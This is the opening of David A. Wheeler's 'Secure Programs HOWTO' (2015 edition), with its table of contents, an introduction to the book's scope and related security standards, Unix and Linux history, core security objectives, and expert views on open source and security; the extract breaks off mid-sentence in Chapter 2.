Secure Programs HOWTO
Secure Programs HOWTO
David A. Wheeler
Copyright © 1999, 2000, 2001, 2002, 2003, 2004, 2015 David A. Wheeler
v3.72, 2015-09-19
Secure Programming HOWTO
by David A. Wheeler
v3.72 Edition
Published v3.72, 2015-09-19
Copyright © 1999, 2000, 2001, 2002, 2003, 2004, 2015 David A. Wheeler
This book provides a set of design and implementation guidelines for writing secure programs. Such programs
include application programs used as viewers of remote data, web applications (including CGI scripts), network
servers, and setuid/setgid programs. Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl, and Ada95 are
included. It especially covers Linux and Unix based systems, but much of its material applies to any system. For a
current version of the book, see http://www.dwheeler.com/secure-programs
This book is Copyright (C) 1999-2015 David A. Wheeler. Permission is granted to copy, distribute and/or modify this book under the terms of the
GNU Free Documentation License (GFDL), Version 1.1 or any later version published by the Free Software Foundation; with the invariant
sections being “About the Author”, with no Front-Cover Texts, and no Back-Cover texts. A copy of the license is included in the section entitled
“GNU Free Documentation License”. This book is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. The image of the Sallet (ca. 1450) is provided
by the Walters Art Museum in Baltimore, Maryland, at http://art.thewalters.org/detail/40677/sallet/.
Table of Contents
1. Introduction............................................................................................................................................1
2. Background ............................................................................................................................................5
2.1. History of Unix, Linux, and Open Source / Free Software.........................................................5
2.1.1. Unix ................................................................................................................................5
2.1.2. Free Software Foundation ..............................................................................................6
2.1.3. Linux...............................................................................................................................6
2.1.4. Open Source / Free Software..........................................................................................6
2.1.5. Comparing Linux and Unix............................................................................................7
2.2. Security Principles ......................................................................................................................7
2.3. Why do Programmers Write Insecure Code?..............................................................................8
2.4. Is Open Source Good for Security? ............................................................................................9
2.4.1. View of Various Experts .................................................................................................9
2.4.2. Why Closing the Source Doesn’t Halt Attacks ............................................................11
2.4.3. Why Keeping Vulnerabilities Secret Doesn’t Make Them Go Away ..........................12
2.4.4. How OSS/FS Counters Trojan Horses .........................................................................13
2.4.5. Other Advantages .........................................................................................................14
2.4.6. Bottom Line..................................................................................................................14
2.5. Types of Secure Programs.........................................................................................................15
2.6. Paranoia is a Virtue ...................................................................................................................16
2.7. Why Did I Write This Document? ............................................................................................16
2.8. Sources of Design and Implementation Guidelines ..................................................................17
2.9. Other Sources of Security Information .....................................................................................19
2.10. Document Conventions ...........................................................................................................19
3. Summary of Linux and Unix Security Features ...............................................................................21
3.1. Processes ...................................................................................................................................22
3.1.1. Process Attributes .........................................................................................................22
3.1.2. POSIX Capabilities ......................................................................................................23
3.1.3. Process Creation and Manipulation..............................................................................24
3.2. Files ...........................................................................................................................................24
3.2.1. Filesystem Object Attributes ........................................................................................25
3.2.2. POSIX Access Control Lists (ACLs) ...........................................................................26
3.2.2.1. History of POSIX Access Control Lists (ACLs) .............................................27
3.2.2.2. Data used in POSIX Access Control Lists (ACLs)..........................................27
3.2.3. Creation Time Initial Values.........................................................................................28
3.2.4. Changing Access Control Attributes ............................................................................29
3.2.5. Using Access Control Attributes ..................................................................................29
3.2.6. Filesystem Hierarchy....................................................................................................29
3.3. System V IPC............................................................................................................................29
3.4. Sockets and Network Connections............................................................................................30
3.5. Signals .......................................................................................................................................31
3.6. Quotas and Limits .....................................................................................................................32
3.7. Dynamically Linked Libraries ..................................................................................................33
3.8. Audit..........................................................................................................................................34
3.9. PAM ..........................................................................................................................................34
3.10. Specialized Security Extensions for Unix-like Systems .........................................................34
iii
4. Security Requirements ........................................................................................................................36
4.1. Common Criteria Introduction..................................................................................................36
4.2. Security Environment and Objectives .......................................................................................38
4.3. Security Functionality Requirements........................................................................................39
4.4. Security Assurance Measure Requirements..............................................................................40
5. Validate All Input.................................................................................................................................43
5.1. Basics of input validation..........................................................................................................43
5.2. Input Validation Tools including Regular Expressions .............................................................45
5.2.1. Introduction to regular expressions ..............................................................................46
5.2.2. Using regular expressions for input validation.............................................................46
5.2.3. Regular expression denial of service (reDOS) attacks .................................................46
5.3. Command line ...........................................................................................................................47
5.4. Environment Variables ..............................................................................................................47
5.4.1. Some Environment Variables are Dangerous ...............................................................47
5.4.2. Environment Variable Storage Format is Dangerous ...................................................48
5.4.3. The Solution - Extract and Erase..................................................................................48
5.4.4. Don’t Let Users Set Their Own Environment Variables ..............................................50
5.5. File Descriptors .........................................................................................................................51
5.6. File Names ................................................................................................................................51
5.7. File Contents .............................................................................................................................52
5.8. Web-Based Application Inputs (Especially CGI Scripts) .........................................................53
5.9. Other Inputs...............................................................................................................................54
5.10. Human Language (Locale) Selection......................................................................................54
5.10.1. How Locales are Selected...........................................................................................54
5.10.2. Locale Support Mechanisms ......................................................................................54
5.10.3. Legal Values ...............................................................................................................55
5.10.4. Bottom Line................................................................................................................56
5.11. Character Encoding.................................................................................................................56
5.11.1. Introduction to Character Encoding ...........................................................................57
5.11.2. Introduction to UTF-8 ................................................................................................57
5.11.3. UTF-8 Security Issues ................................................................................................58
5.11.4. UTF-8 Legal Values....................................................................................................58
5.11.5. UTF-8 Related Issues .................................................................................................60
5.12. Prevent Cross-site Malicious Content on Input.......................................................................60
5.13. Filter HTML/URIs That May Be Re-presented ......................................................................60
5.13.1. Remove or Forbid Some HTML Data ........................................................................60
5.13.2. Encoding HTML Data................................................................................................61
5.13.3. Validating HTML Data...............................................................................................61
5.13.4. Validating Hypertext Links (URIs/URLs)..................................................................63
5.13.5. Other HTML tags .......................................................................................................67
5.13.6. Related Issues .............................................................................................................68
5.14. Forbid HTTP GET To Perform Non-Queries .........................................................................68
5.15. Counter SPAM ........................................................................................................................69
5.16. Limit Valid Input Time and Load Level..................................................................................70
iv
6. Restrict Operations to Buffer Bounds (Avoid Buffer Overflow) .....................................................72
6.1. Dangers in C/C++ .....................................................................................................................73
6.2. Library Solutions in C/C++.......................................................................................................75
6.2.1. Standard C Library Solution.........................................................................................75
6.2.2. Static and Dynamically Allocated Buffers ...................................................................77
6.2.3. strlcpy and strlcat..........................................................................................................78
6.2.4. asprintf and vasprintf ....................................................................................................79
6.2.5. libmib............................................................................................................................79
6.2.6. Safestr library (Messier and Viega) ..............................................................................80
6.2.7. C++ std::string class .....................................................................................................80
6.2.8. Libsafe ..........................................................................................................................80
6.2.9. Other Libraries..............................................................................................................81
6.3. Compilation Solutions in C/C++...............................................................................................81
6.4. Other Languages .......................................................................................................................83
7. Design Your Program for Security.....................................................................................................84
7.1. Follow Good Security Design Principles ..................................................................................84
7.2. Secure the Interface...................................................................................................................85
7.3. Separate Data and Control ........................................................................................................85
7.4. Minimize Privileges ..................................................................................................................85
7.4.1. Minimize the Privileges Granted ..................................................................................86
7.4.2. Minimize the Time the Privilege Can Be Used ............................................................88
7.4.3. Minimize the Time the Privilege is Active ...................................................................88
7.4.4. Minimize the Modules Granted the Privilege...............................................................89
7.4.5. Consider Using FSUID To Limit Privileges.................................................................90
7.4.6. Consider Using Chroot to Minimize Available Files ...................................................90
7.4.7. Consider Minimizing the Accessible Data ...................................................................92
7.4.8. Consider Minimizing the Resources Available ............................................................92
7.5. Minimize the Functionality of a Component ............................................................................92
7.6. Avoid Creating Setuid/Setgid Scripts........................................................................................92
7.7. Configure Safely and Use Safe Defaults...................................................................................92
7.8. Load Initialization Values Safely ..............................................................................................93
7.9. Minimize the Accessible Data ..................................................................................................94
7.10. Fail Safe ..................................................................................................................................94
7.11. Avoid Race Conditions............................................................................................................94
7.11.1. Sequencing (Non-Atomic) Problems .........................................................................95
7.11.1.1. Atomic Actions in the Filesystem..................................................................95
7.11.1.2. Temporary Files .............................................................................................96
7.11.2. Locking.....................................................................................................................102
7.11.2.1. Using Files as Locks ....................................................................................102
7.11.2.2. Other Approaches to Locking......................................................................104
7.12. Trust Only Trustworthy Channels .........................................................................................104
7.13. Set up a Trusted Path.............................................................................................................105
7.14. Use Internal Consistency-Checking Code ............................................................................107
7.15. Self-limit Resources ..............................................................................................................107
7.16. Prevent Cross-Site (XSS) Malicious Content .......................................................................107
7.16.1. Explanation of the Problem ......................................................................................107
7.16.2. Solutions to Cross-Site Malicious Content...............................................................108
v
7.16.2.1. Identifying Special Characters.....................................................................109
7.16.2.2. Filtering........................................................................................................110
7.16.2.3. Encoding (Quoting) .....................................................................................110
7.17. Foil Semantic Attacks ...........................................................................................................112
7.18. Be Careful with Data Types ..................................................................................................113
7.19. Avoid Algorithmic Complexity Attacks ...............................................................................113
8. Carefully Call Out to Other Resources............................................................................................114
8.1. Call Only Safe Library Routines.............................................................................................114
8.2. Limit Call-outs to Valid Values ...............................................................................................114
8.3. Handle Metacharacters............................................................................................................114
8.3.1. SQL injection..............................................................................................................115
8.3.2. Shell injection.............................................................................................................115
8.3.3. Problematic pathnames and filenames........................................................................117
8.3.4. Other injection issues .................................................................................................118
8.4. Call Only Interfaces Intended for Programmers .....................................................................119
8.5. Check All System Call Returns ..............................................................................................119
8.6. Avoid Using vfork(2) ..............................................................................................................119
8.7. Counter Web Bugs When Retrieving Embedded Content ......................................................120
8.8. Hide Sensitive Information .....................................................................................................121
9. Send Information Back Judiciously .................................................................................................122
9.1. Minimize Feedback.................................................................................................................122
9.2. Don’t Include Comments ........................................................................................................122
9.3. Handle Full/Unresponsive Output...........................................................................................122
9.4. Control Data Formatting (Format Strings)..............................................................................122
9.5. Control Character Encoding in Output ...................................................................................124
9.6. Prevent Include/Configuration File Access.............................................................................125
10. Language-Specific Issues.................................................................................................................127
10.1. C/C++....................................................................................................................................127
10.2. Perl ........................................................................................................................................130
10.3. Python ...................................................................................................................................131
10.4. Shell Scripting Languages (sh and csh Derivatives) .............................................................132
10.5. Ada ........................................................................................................................................133
10.6. Java........................................................................................................................................134
10.7. Tcl .........................................................................................................................................137
10.8. PHP .......................................................................................................................................141
11. Special Topics ...................................................................................................................................145
11.1. Passwords ..............................................................................................................................145
11.2. Authenticating on the Web....................................................................................................146
11.2.1. Authenticating on the Web: Logging In ...................................................................147
11.2.2. Authenticating on the Web: Subsequent Actions .....................................................148
11.2.3. Authenticating on the Web: Logging Out.................................................................150
11.3. Random Numbers .................................................................................................................150
11.4. Specially Protect Secrets (Passwords and Keys) in User Memory .......................................152
11.5. Cryptographic Algorithms and Protocols .............................................................................153
11.5.1. Cryptographic Protocols...........................................................................................154
11.5.2. Symmetric Key Encryption Algorithms ...................................................................155
vi
11.5.3. Public Key Algorithms .............................................................................................157
11.5.4. Cryptographic Hash Algorithms...............................................................................157
11.5.5. Integrity Checking ....................................................................................................158
11.5.6. Randomized Message Authentication Mode (RMAC) ............................................158
11.5.7. Other Cryptographic Issues ......................................................................................158
11.6. Using PAM............................................................................................................................159
11.7. Tools ......................................................................................................................................159
11.8. Windows CE..........................................................................................................................162
11.9. Write Audit Records .............................................................................................................162
11.10. Physical Emissions..............................................................................................................163
11.11. Miscellaneous......................................................................................................................163
12. Conclusion ........................................................................................................................................165
13. Bibliography .....................................................................................................................................166
A. History................................................................................................................................................174
B. Acknowledgements............................................................................................................................175
C. About the Documentation License ..................................................................................................176
D. GNU Free Documentation License..................................................................................................178
E. Endorsements ....................................................................................................................................184
F. About the Author...............................................................................................................................185
Index........................................................................................................................................................186
vii
List of Tables
3-1. POSIX ACL Entry Types ...................................................................................................................28
5-1. Legal UTF-8 Sequences .....................................................................................................................59
viii
Chapter 1. Introduction
A wise man attacks the city of the mighty
and pulls down the stronghold in which
they trust.
Proverbs 21:22 (NIV)
This book describes a set of guidelines for writing secure programs. For purposes of this book, a “secure
program” is a program that sits on a security boundary, taking input from a source that does not have the
same access rights as the program. Such programs include application programs used as viewers of
remote data, web applications (including CGI scripts), network servers, and setuid/setgid programs. This
book does not address modifying the operating system kernel itself, although many of the principles
discussed here do apply. These guidelines were developed as a survey of “lessons learned” from various
sources on how to create such programs (along with additional observations by the author), reorganized
into a set of larger principles. This book includes specific guidance for a number of languages, including
C, C++, Java, Perl, PHP, Python, Tcl, and Ada95. It especially covers Linux and Unix based systems, but
much of its material applies to any system.
Why read this book? Because today, programs are under attack. Techniques such as constantly patching
systems and training users in computer security are simply not enough to counter computer attacks. The
Witty worm of 2004, for example, demonstrated that depending on patches "failed spectacularly"
because attackers could deploy attacks faster than users could install patches (the attack began one day
after the patch was announced, and only 45 minutes later most vulnerable systems were invected). The
Witty worm also demonstrated that deploying proactive measures wasn’t enough: all attackees had at
least installed a firewall. Long ago, putting a fence around a computer eliminated most threats. Today,
most programs have network connections or take data sent through a network (and possibly from an
attacker), and other defensive measures simply haven’t been able to counter attackers. Thus, all software
developers must know how to counter attacks.
You can find the master copy of this book at http://www.dwheeler.com/secure-programs. This book is
also part of the Linux Documentation Project (LDP) at http://www.tldp.org It’s also mirrored in several
other places. Please note that these mirrors, including the LDP copy and/or the copy in your distribution,
may be older than the master copy. I’d like to hear comments on this book, but please do not send
comments until you’ve checked to make sure that your comment is valid for the latest version.
This book does not cover assurance measures, software engineering processes, and quality assurance
approaches, which are important but widely discussed elsewhere. Such measures include testing, peer
review, configuration management, and formal methods. Documents specifically identifying sets of
development assurance measures for security issues include the Common Criteria (CC, [CC 1999]) and
the Systems Security Engineering Capability Maturity Model [SSE-CMM 1999]. Inspections and other
peer review techniques are discussed in [Wheeler 1996]. This book does briefly discuss ideas from the
CC, but only as an organizational aid to discuss security requirements. More general sets of software
engineering processes are defined in documents such as the Software Engineering Institute’s Capability
Maturity Model for Software (SW-CMM) [Paulk 1993a, 1993b] and ISO 12207 [ISO 12207]. General
international standards for quality systems are defined in ISO 9000 and ISO 9001 [ISO 9000, 9001].
This book does not discuss how to configure a system (or network) to be secure in a given environment.
This is clearly necessary for secure use of a given program, but a great many other documents discuss
secure configurations. An excellent general book on configuring Unix-like systems to be secure is
1
Chapter 1. Introduction
Garfinkel [1996]. Other books for securing Unix-like systems include Anonymous [1998]. You can also
find information on configuring Unix-like systems at web sites such as
http://www.unixtools.com/security.html. Information on configuring a Linux system to be secure is
available in a wide variety of documents including Fenzi [1999], Seifried [1999], Wreski [1998], Swan
[2001], and Anonymous [1999]. Geodsoft [2001] describes how to harden OpenBSD, and many of its
suggestions are useful for any Unix-like system. Information on auditing existing Unix-like systems are
discussed in Mookhey [2002]. For Linux systems (and eventually other Unix-like systems), you may
want to examine the Bastille Hardening System, which attempts to “harden” or “tighten” the Linux
operating system. You can learn more about Bastille at http://www.bastille-linux.org; it is available for
free under the General Public License (GPL). Other hardening systems include grsecurity. For Windows
2000, you might want to look at Cox [2000]. The U.S. National Security Agency (NSA) maintains a set
of security recommendation guides at http://nsa1.www.conxion.com, including the “60 Minute Network
Security Guide.” If you’re trying to establish a public key infrastructure (PKI) using open source tools,
you might want to look at the Open Source PKI Book. More about firewalls and Internet security is
found in [Cheswick 1994].
Configuring a computer is only part of Computer Security Management, a larger area that also covers
how to deal with viruses, what kind of organizational security policy is needed, business continuity
plans, and so on. There are international standards and guidance for security management. ISO 13335 is
a five-part technical report giving guidance on security management [ISO 13335]. ISO/IEC 17799:2000
defines a code of practice [ISO 17799]; its stated purpose is to give high-level and general
“recommendations for information security management for use by those who are responsible for
initiating, implementing or maintaining security in their organization.” The document specifically
identifies itself as “a starting point for developing organization specific guidance.” It also states that not
all of the guidance and controls it contains may be applicable, and that additional controls not contained
may be required. Even more importantly, they are intended to be broad guidelines covering a number of
areas. and not intended to give definitive details or "how-tos". It’s worth noting that the original signing
of ISO/IEC 17799:2000 was controversial; Belgium, Canada, France, Germany, Italy, Japan and the US
voted against its adoption. However, it appears that these votes were primarily a protest on parliamentary
procedure, not on the content of the document, and certainly people are welcome to use ISO 17799 if
they find it helpful. More information about ISO 17799 can be found in NIST’s ISO/IEC 17799:2000
FAQ. ISO 17799 is highly related to BS 7799 part 1 and 2; more information about BS 7799 can be
found at http://www.xisec.com/faq.htm. ISO 17799 is currently under revision. It’s important to note that
none of these standards (ISO 13335, ISO 17799, or BS 7799 parts 1 and 2) are intended to be a detailed
set of technical guidelines for software developers; they are all intended to provide broad guidelines in a
number of areas. This is important, because software developers who simply only follow (for example)
ISO 17799 will generally not produce secure software - developers need much, much, much more detail
than ISO 17799 provides.
Of course, computer security management is part of the even broader area of security in general. Clearly
you should ensure that your physical environment is secure as well, depending on your threats. You
might find this Anti-Defamation League document useful.
The Commonly Accepted Security Practices & Recommendations (CASPR) project at
http://www.caspr.org is trying to distill information security knowledge into a series of papers available
to all (under the GNU FDL license, so that future document derivatives will continue to be available to
all). Clearly, security management needs to include keeping with patches as vulnerabilities are found and
fixed. Beattie [2002] provides an interesting analysis on how to determine when to apply patches
contrasting risk of a bad patch to the risk of intrusion (e.g., under certain conditions, patches are
optimally applied 10 or 30 days after they are released).
2
Chapter 1. Introduction
If you’re interested in the current state of vulnerabilities, there are other resources available to use. The
CVE at http://cve.mitre.org gives a standard identifier for each (widespread) vulnerability. The paper
SecurityTracker Statistics analyzes vulnerabilities to determine what were the most common
vulnerabilities. The Internet Storm Center at http://isc.incidents.org/ shows the prominence of various
Internet attacks around the world.
This book assumes that the reader understands computer security issues in general, the general security
model of Unix-like systems, networking (in particular TCP/IP based networks), and the C programming
language. This book does include some information about the Linux and Unix programming model for
security. If you need more information on how TCP/IP based networks and protocols work, including
their security protocols, consult general works on TCP/IP such as [Murhammer 1998].
When I first wrote this document, there were many short articles but no books on writing secure
programs. There are now other books on writing secure programs. One is “Building Secure Software” by
John Viega and Gary McGraw [Viega 2002]; this is a very good book that discusses a number of
important security issues, but it omits a large number of important security problems that are instead
covered here. Basically, this book selects several important topics and covers them well, but at the cost of
omitting many other important topics. The Viega book has a little more information for Unix-like
systems than for Windows systems, but much of it is independent of the kind of system. The other book
is “Writing Secure Code” by Michael Howard and David LeBlanc [Howard 2002]. The title of that book
is misleading; that book is solely about writing secure programs for Windows, and is not very helpful if
you are writing programs for any other system. This shouldn’t be surprising; it’s published by Microsoft
press, and its copyright is owned by Microsoft. If you are trying to write secure programs for Microsoft’s
Windows systems, though, it’s a good book. Another useful source of secure programming guidance is
the The Open Web Application Security Project (OWASP) Guide to Building Secure Web Applications
and Web Services; it has more on process, and less specifics than this book, but it has useful material in it.
This book expecially focuses on all Unix-like systems, including Linux-based systems (including
Debian, Ubuntu, Red Hat Enterprise Linux, Fedora, CentOS, and SuSE), Unix systems (including
Solaris, FreeBSD, NetBSD, and OpenBSD), MacOS, Android, and iOS. In several places it includes
details about Linux specifically. That said, much of this material is not limited to a particular operating
system, and there’s some material specifically on other systems like Windows. If you know relevant
information not already included here, please let me know.
This book is copyright (C) 1999-2015 David A. Wheeler and is covered by the GNU Free
Documentation License (GFDL); see Appendix C and Appendix D for more information.
Chapter 2 discusses the background of Unix, Linux, and security. Chapter 3 describes the general Unix
and Linux security model, giving an overview of the security attributes and operations of processes,
filesystem objects, and so on. (Windows is not the same, but there are many similarities.) This is
followed by the meat of this book, a set of design and implementation guidelines for developing
applications. This focuses more on Linux and Unix systems, but not exclusively so. The book ends with
conclusions in Chapter 12, followed by a lengthy bibliography and appendixes.
The design and implementation guidelines are divided into categories which I believe emphasize the
programmer’s viewpoint. Programs accept inputs, process data, call out to other resources, and produce
output, as shown in Figure 1-1; notionally all security guidelines fit into one of these categories. I’ve
subdivided “process data” into structuring program internals and approach, avoiding buffer overflows
(which in some cases can also be considered an input issue), language-specific information, and special
topics. The chapters are ordered to make the material easier to follow. Thus, the book chapters giving
guidelines discuss validating all input (Chapter 5), avoiding buffer overflows (Chapter 6), structuring
3
Chapter 1. Introduction
program internals and approach (Chapter 7), carefully calling out to other resources (Chapter 8),
judiciously sending information back (Chapter 9), language-specific information (Chapter 10), and
finally information on special topics such as how to acquire random numbers (Chapter 11).
Program
Input Output
Process Data
(Structure Program Internals,
Avoid Buffer Overflow,
Language-Specific Issues, &
Special Topics)
Call-out to
other
programs
4
Chapter 2. Background
I issued an order and a search was
made, and it was found that this city has
a long history of revolt against kings
and has been a place of rebellion and
sedition.
Ezra 4:19 (NIV)
2.1.1. Unix
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at AT&T Bell Labs began developing a
small operating system on a little-used PDP-7. The operating system was soon christened Unix, a pun on
an earlier operating system project called MULTICS. In 1972-1973 the system was rewritten in the
programming language C, an unusual step that was visionary: due to this decision, Unix was the first
widely-used operating system that could switch from and outlive its original hardware. Other innovations
were added to Unix as well, in part due to synergies between Bell Labs and the academic community. In
1979, the “seventh edition” (V7) version of Unix was released, the grandfather of all extant Unix
systems.
After this point, the history of Unix becomes somewhat convoluted. The academic community, led by
Berkeley, developed a variant called the Berkeley Software Distribution (BSD), while AT&T continued
developing Unix under the names “System III” and later “System V”. In the late 1980’s through early
1990’s the “wars” between these two major strains raged. After many years each variant adopted many of
the key features of the other. Commercially, System V won the “standards wars” (getting most of its
interfaces into the formal standards), and most hardware vendors switched to AT&T’s System V.
However, System V ended up incorporating many BSD innovations, so the resulting system was more a
merger of the two branches. The BSD branch did not die, but instead became widely used for research,
for PC hardware, and for single-purpose servers (e.g., many web sites use a BSD derivative).
The result was many different versions of Unix, all based on the original seventh edition. Most versions
of Unix were proprietary and maintained by their respective hardware vendor, for example, Sun Solaris
is a variant of System V. Three versions of the BSD branch of Unix ended up as open source: FreeBSD
(concentrating on ease-of-installation for PC-type hardware), NetBSD (concentrating on many different
CPU architectures), and a variant of NetBSD, OpenBSD (concentrating on security). More general
information about Unix history can be found at
http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm, http://perso.wanadoo.fr/levenez/unix, and
http://www.crackmonkey.org/unix.html (note that Microsoft Windows systems can’t read that last one).
The Unix Heritage Society refers to several sources of Unix history. Much more information about the
BSD history can be found in [McKusick 1999] and
ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree.
5
Chapter 2. Background
A slightly old but interesting advocacy piece that presents arguments for using Unix-like systems (instead
of Microsoft’s products) is John Kirch’s paper “Microsoft Windows NT Server 4.0 versus UNIX”.
2.1.3. Linux
In 1991 Linus Torvalds began developing an operating system kernel, which he named “Linux”
[Torvalds 1999]. This kernel could be combined with the FSF material and other components (in
particular some of the BSD components and MIT’s X-windows software) to produce a freely-modifiable
and very useful operating system. This book will term the kernel itself the “Linux kernel” and an entire
combination as “Linux”. Note that many use the term “GNU/Linux” instead for this combination.
In the Linux community, different organizations have combined the available components differently.
Each combination is called a “distribution”, and the organizations that develop distributions are called
“distributors”. Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel, and Debian.
There are differences between the various distributions, but all distributions are based on the same
foundation: the Linux kernel and the GNU glibc libraries. Since both are covered by “copyleft” style
licenses, changes to these foundations generally must be made available to all, a unifying force between
the Linux distributions at their foundation that does not exist between the BSD and AT&T-derived Unix
systems. This book is not specific to any Linux distribution; when it discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater, valid assumptions for essentially all
current major Linux distributions.
6
Chapter 2. Background
using the term may have other motives (e.g., higher reliability) or simply wish to appear less strident. For
information on this definition of free software, and the motivations behind it, can be found at
http://www.fsf.org.
Those interested in reading advocacy pieces for open source software and free software should see
http://www.opensource.org and http://www.fsf.org. There are other documents which examine such
software, for example, Miller [1995] found that the open source software were noticeably more reliable
than proprietary software (using their measurement technique, which measured resistance to crashing
due to random input).
• Confidentiality (also known as secrecy), meaning that the computing system’s assets can be read only
by authorized parties.
• Integrity, meaning that the assets can only be modified or deleted by authorized parties in authorized
ways.
7
Chapter 2. Background
• Availability, meaning that the assets are accessible to the authorized parties in a timely manner (as
determined by the systems requirements). The failure to meet this goal is called a denial of service.
Some people define additional major security objectives, while others lump those additional goals as
special cases of these three. For example, some separately identify non-repudiation as an objective; this
is the ability to “prove” that a sender sent or receiver received a message (or both), even if the sender or
receiver wishes to deny it later. Privacy is sometimes addressed separately from confidentiality; some
define this as protecting the confidentiality of a user (e.g., their identity) instead of the data. Most
objectives require identification and authentication, which is sometimes listed as a separate objective.
Often auditing (also called accountability) is identified as a desirable security objective. Sometimes
“access control” and “authenticity” are listed separately as well. For example, The U.S. Department of
Defense (DoD), in DoD directive 3600.1 defines “information assurance” as “information operations
(IO) that protect and defend information and information systems by ensuring their availability, integrity,
authentication, confidentiality, and nonrepudiation. This includes providing for restoration of
information systems by incorporating protection, detection, and reaction capabilities.”
In any case, it is important to identify your program’s overall security objectives, no matter how you
group them together, so that you’ll know when you’ve met them.
Sometimes these objectives are a response to a known set of threats, and sometimes some of these
objectives are required by law. For example, for U.S. banks and other financial institutions, there’s a new
privacy law called the “Gramm-Leach-Bliley” (GLB) Act. This law mandates disclosure of personal
information shared and means of securing that data, requires disclosure of personal information that will
be shared with third parties, and directs institutions to give customers a chance to opt out of data sharing.
[Jones 2000]
There is sometimes conflict between security and some other general system/software engineering
principles. Security can sometimes interfere with “ease of use”, for example, installing a secure
configuration may take more effort than a “trivial” installation that works but is insecure. Often, this
apparent conflict can be resolved, for example, by re-thinking a problem it’s often possible to make a
secure system also easy to use. There’s also sometimes a conflict between security and abstraction
(information hiding); for example, some high-level library routines may be implemented securely or not,
but their specifications won’t tell you. In the end, if your application must be secure, you must do things
yourself if you can’t be sure otherwise - yes, the library should be fixed, but it’s your users who will be
hurt by your poor choice of library routines.
A good general security principle is “defense in depth”; you should have numerous defense mechanisms
(“layers”) in place, designed so that an attacker has to defeat multiple mechanisms to perform a
successful attack.
For general principles on how to design secure programs, see Section 7.1.
• There is no curriculum that addresses computer security in most schools. Even when there is a
8
Chapter 2. Background
computer security curriculum, they often don’t discuss how to write secure programs as a whole.
Many such curriculum only study certain areas such as cryptography or protocols. These are
important, but they often fail to discuss common real-world issues such as buffer overflows, string
formatting, and input checking. I believe this is one of the most important problems; even those
programmers who go through colleges and universities are very unlikely to learn how to write secure
programs, yet we depend on those very people to write secure programs.
• Programming books/classes do not teach secure/safe programming techniques. Indeed, until recently
there were no books on how to write secure programs at all (this book is one of those few).
• No one uses formal verification methods.
• C is an unsafe language, and the standard C library string functions are unsafe. This is particularly
important because C is so widely used - the “simple” ways of using C permit dangerous exploits.
• Programmers do not think “multi-user.”
• Programmers are human, and humans are lazy. Thus, programmers will often use the “easy” approach
instead of a secure approach - and once it works, they often fail to fix it later.
• Most programmers are simply not good programmers.
• Most programmers are not security people; they simply don’t often think like an attacker does.
• Most security people are not programmers. This was a statement made by some Bugtraq contributors,
but it’s not clear that this claim is really true.
• Most computer security models are terrible.
• There is lots of “broken” legacy software. Fixing this software (to remove security faults or to make it
work with more restrictive security policies) is difficult.
• Consumers don’t care about security. (Personally, I have hope that consumers are beginning to care
about security; a computer system that is constantly exploited is neither useful nor user-friendly. Also,
many consumers are unaware that there’s even a problem, assume that it can’t happen to them, or think
that that things cannot be made better.)
• Security costs extra development time.
• Security costs in terms of additional testing (red teams, etc.).
9
Chapter 2. Background
Bruce Schneier is a well-known expert on computer security and cryptography. He argues that smart
engineers should “demand open source code for anything related to security” [Schneier 1999], and he
also discusses some of the preconditions which must be met to make open source software secure.
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES) encryption algorithm,
believes that the open source nature of Linux provides a superior vehicle to making security
vulnerabilities easier to spot and fix, “Not only because more people can look at it, but, more
importantly, because the model forces people to write more clear code, and to adhere to standards. This
in turn facilitates security review” [Rijmen 2000].
Elias Levy (Aleph1) is the former moderator of one of the most popular security discussion groups -
Bugtraq. He discusses some of the problems in making open source software secure in his article "Is
Open Source Really More Secure than Closed?". His summary is:
So does all this mean Open Source Software is no better than closed source software when it comes to security
vulnerabilities? No. Open Source Software certainly does have the potential to be more secure than its closed
source counterpart. But make no mistake, simply being open source is no guarantee of security.
Whitfield Diffie is the co-inventor of public-key cryptography (the basis of all Internet security) and chief
security officer and senior staff engineer at Sun Microsystems. In his 2003 article Risky business:
Keeping security a secret, he argues that proprietary vendor’s claims that their software is more secure
because it’s secret is nonsense. He identifies and then counters two main claims made by proprietary
vendors: (1) that release of code benefits attackers more than anyone else because a lot of hostile eyes
can also look at open-source code, and that (2) a few expert eyes are better than several random ones. He
first notes that while giving programmers access to a piece of software doesn’t guarantee they will study
it carefully, there is a group of programmers who can be expected to care deeply: Those who either use
the software personally or work for an enterprise that depends on it. “In fact, auditing the programs on
which an enterprise depends for its own security is a natural function of the enterprise’s own
information-security organization.” He then counters the second argument, noting that “As for the notion
that open source’s usefulness to opponents outweighs the advantages to users, that argument flies in the
face of one of the most important principles in security: A secret that cannot be readily changed should
be regarded as a vulnerability.” He closes noting that
“It’s simply unrealistic to depend on secrecy for security in computer software. You may be able to keep the
exact workings of the program out of general circulation, but can you prevent the code from being
reverse-engineered by serious opponents? Probably not.”
John Viega’s article "The Myth of Open Source Security" also discusses issues, and summarizes things
this way:
Open source software projects can be more secure than closed source projects. However, the very things that
can make open source programs secure -- the availability of the source code, and the fact that large numbers of
users are available to look for and fix security holes -- can also lull people into a false sense of security.
Michael H. Warfield’s "Musings on open source security" is very positive about the impact of open
source software on security. In contrast, Fred Schneider doesn’t believe that open source helps security,
saying “there is no reason to believe that the many eyes inspecting (open) source code would be
successful in identifying bugs that allow system security to be compromised” and claiming that “bugs in
the code are not the dominant means of attack” [Schneider 2000]. He also claims that open source rules
out control of the construction process, though in practice there is such control - all major open source
programs have one or a few official versions with “owners” with reputations at stake. Peter G. Neumann
discusses “open-box” software (in which source code is available, possibly only under certain
conditions), saying “Will open-box software really improve system security? My answer is not by itself,
10
Chapter 2. Background
although the potential is considerable” [Neumann 2000]. TruSecure Corporation, under sponsorship by
